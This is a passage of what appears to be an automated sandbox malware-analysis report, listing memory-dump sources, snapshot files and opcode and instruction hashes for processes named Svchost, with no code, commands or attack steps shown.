                                                                                                                                                                                                          • Snapshot File: hcaresult_12_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: cf019eb1b2b1bb9cfa44b5eac7abcb0d25bf66bb7ad5b99da642c01ba2b3e260
                                                                                                                                                                                                          • Instruction ID: 009461f86b1f33b269f6d3b12a211779ccf6ffca071ecfcc953e3648b6acb513
                                                                                                                                                                                                          • Opcode Fuzzy Hash: cf019eb1b2b1bb9cfa44b5eac7abcb0d25bf66bb7ad5b99da642c01ba2b3e260
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0E014215A0E7800FE792E73858B15667FE29F97240B4C05BAD988C70E7DD0CA981C392
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: fda73d4226a250b73f73739bd9ed47ab57a7c7f2a52319910b1393f13497d95b
                                                                                                                                                                                                          • Instruction ID: eb308a6018a7a454b0da12bb82e53afd78df7513915c95c607ac4b91ff8bf1ee
                                                                                                                                                                                                          • Opcode Fuzzy Hash: fda73d4226a250b73f73739bd9ed47ab57a7c7f2a52319910b1393f13497d95b
                                                                                                                                                                                                          • Instruction Fuzzy Hash: FA32A420B1AA0A4BE798EBBC84B5679B7D2FF99301F54057DE54EC32D2DE78AC018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: af3ce79240ee3e4251d7d080e6bd7621355d7a48694b2d27dfd6ca2ac0687bc4
                                                                                                                                                                                                          • Instruction ID: 3cc7c6ff05a80f9b7dc8135cdfd52358817ca9034d23a6384156fe6cf26279ed
                                                                                                                                                                                                          • Opcode Fuzzy Hash: af3ce79240ee3e4251d7d080e6bd7621355d7a48694b2d27dfd6ca2ac0687bc4
                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF511F10B0E6C90FE796AB7858B5279BFD5DF87216B0804FEE08DC72A3DD485806C352
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: bc67a42b9e5711b19853d06672161367e28b489775fe12ad4dd22ed7a0d1a0fb
                                                                                                                                                                                                          • Instruction ID: c9dfefbe41a6d4e24929dac092a8c045699eb2a0276cb1ddf536e94c5271d3f0
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bc67a42b9e5711b19853d06672161367e28b489775fe12ad4dd22ed7a0d1a0fb
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 14712A21B1EA8A0FE795EB6C98751B97BE2EF87211B0801BED44DC7293DD6C6C428351
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 1a0f30e50403163da6acd21ca0528b93964c85d5acfda645acf4c21e78088b47
                                                                                                                                                                                                          • Instruction ID: 06f7a886e4f70f0172bb095c22f61d9c07bd50589c8ff395a231f501963d4de9
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1a0f30e50403163da6acd21ca0528b93964c85d5acfda645acf4c21e78088b47
                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1319521B1D9490FE798FB6C946A37DA7C2EF99351F0405BEE44EC7293DD68AC428341
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7221289175de5979ecf79fee09a1431d51a386d69c5c6ef6a6fb142633adab6d
                                                                                                                                                                                                          • Instruction ID: 7041502b50169f345e977a1411268c5c48f1e6ba4af3fac69319e5c48018af46
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7221289175de5979ecf79fee09a1431d51a386d69c5c6ef6a6fb142633adab6d
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E31B421B19A095FEB94BBFC58693BE77D1EF99311F0402BAE00DC32D2DD6C68418391
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: c40c2d0d7cafe95d29ff0430e7431ecbb4223c2f5c498d26ed39f6be10f5ba81
                                                                                                                                                                                                          • Instruction ID: f93118315fc6f69ad1301257d89bd0171262d871b990ee4bdd227551985dcb33
                                                                                                                                                                                                          • Opcode Fuzzy Hash: c40c2d0d7cafe95d29ff0430e7431ecbb4223c2f5c498d26ed39f6be10f5ba81
                                                                                                                                                                                                          • Instruction Fuzzy Hash: DD318F34B19A0E9FEB44EBA8C4B56AE7BF1FF89301F540579D109D3286DE78A842C750
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000D.00000002.3388148931.00007FFD348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD348A0000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_7ffd348a0000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 56a21a4ba6c2fce279dd1e3bb4cc7b18ce4391e90724bb7530f243b7f62471a9
                                                                                                                                                                                                          • Instruction ID: 87fe14d80feb4ddabe8eb8e7c86290d91f15150215e0965982c107e532a960b7
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 56a21a4ba6c2fce279dd1e3bb4cc7b18ce4391e90724bb7530f243b7f62471a9
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 92014205A0E7810FE792EB3C58B15667FE19F83200B4C05BAD9C8C70E7ED0CA981C392
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.3988325753.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 58bcd162def11e24d66bd7ada26db5e2f6f7d760422de7c9198c408388086e90
                                                                                                                                                                                                          • Instruction ID: 14c37e94253c540277f1ef2abbfabde1cebeb45b2661068c6b6f0f0ee6efc94f
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 58bcd162def11e24d66bd7ada26db5e2f6f7d760422de7c9198c408388086e90
                                                                                                                                                                                                          • Instruction Fuzzy Hash: E2327261B2CA494FE798EBAC84B56B97BD2FF99300F54057DE40ED32D2DE38A8018741
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.3988325753.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: bfdef579e49f48c99d5a2133d2b2a95fb47fdf9adab2c10ab6b6a5e55d0bbf8a
                                                                                                                                                                                                          • Instruction ID: e13b954ac7394f9d629471c7e3f60d8f06c2a1cded34ed7a3a23b41d7b91b8fc
                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfdef579e49f48c99d5a2133d2b2a95fb47fdf9adab2c10ab6b6a5e55d0bbf8a
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5C51F010B1EAC90FE796A77C58B52B5AFD5DF87216B0804FEE08DC7193DD585806D342
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.3988325753.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: da527ec62d2d073fbf463f59722d82e2e0c877474c24e81fdcc53193cec27dee
                                                                                                                                                                                                          • Instruction ID: 411fefc5d2119636bdef41d3b8d1bf7b09ab924c028fc11ccdc532ce527f9dec
                                                                                                                                                                                                          • Opcode Fuzzy Hash: da527ec62d2d073fbf463f59722d82e2e0c877474c24e81fdcc53193cec27dee
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34712721B1DA8A0FE795E76C88752B97BE2EF87221B0801BED04DD7293DD6C6C468351
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.3988325753.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 7cc8a49f2f710c21f8df5900e1346ed0c1957315ad97ffe51bced916d79307a3
                                                                                                                                                                                                          • Instruction ID: e85c3e7f32e45ac58e53a0ea9487b548cc885164f899e0a91e774561085a3153
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7cc8a49f2f710c21f8df5900e1346ed0c1957315ad97ffe51bced916d79307a3
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4931A421B1D9490FF798FB6C946A279A7C2EF99311F0405BEE04EC7293DD68AC429341
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.3988325753.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 8de6bb8d9c15fd5b923bdf307abf9d0cb9faf7c63d87974908dc794fd264fbb7
                                                                                                                                                                                                          • Instruction ID: 404b271a67e65ac9ec4a0d51c8815fc5c15b84143af440dbe982aab34de7b40b
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8de6bb8d9c15fd5b923bdf307abf9d0cb9faf7c63d87974908dc794fd264fbb7
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21319421B18D095FEB54BBEC58693BD77D5EF99311F1401BAE40DC32D2DE2868418791
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.3988325753.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 24f76ee1af6a226c84119d13d51cd0d9a728a37b5855db904c3b6e3a8a7593fc
                                                                                                                                                                                                          • Instruction ID: c55b9e6cc8588f33b3d7745012864ab257771777d49fa24b09d61fcf18231fdb
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 24f76ee1af6a226c84119d13d51cd0d9a728a37b5855db904c3b6e3a8a7593fc
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A316D34B18A0A8FEB94EBA8C4B56FD7BF1FF99300F544579D009E7286CE3868528751
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                          • Source File: 0000000E.00000002.3988325753.00007FFD34890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34890000, based on PE: false
                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                          • Snapshot File: hcaresult_14_2_7ffd34890000_Svchost.jbxd
                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                          • Opcode ID: 5100c43f526d48407f5309c24b21d6bce1ec8fdbd63f4f278b9028cba7ca3d06
                                                                                                                                                                                                          • Instruction ID: 834fa063e1bc9ce57919767e665a6cac12c67fec20b2e93916c1a19d44ffd50c
                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5100c43f526d48407f5309c24b21d6bce1ec8fdbd63f4f278b9028cba7ca3d06
                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4801F215A0CB910FF756A73C58B15767FE19F97210B8805BED88DC71E7DD08AA819382
                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                          Uniqueness Score: -1.00%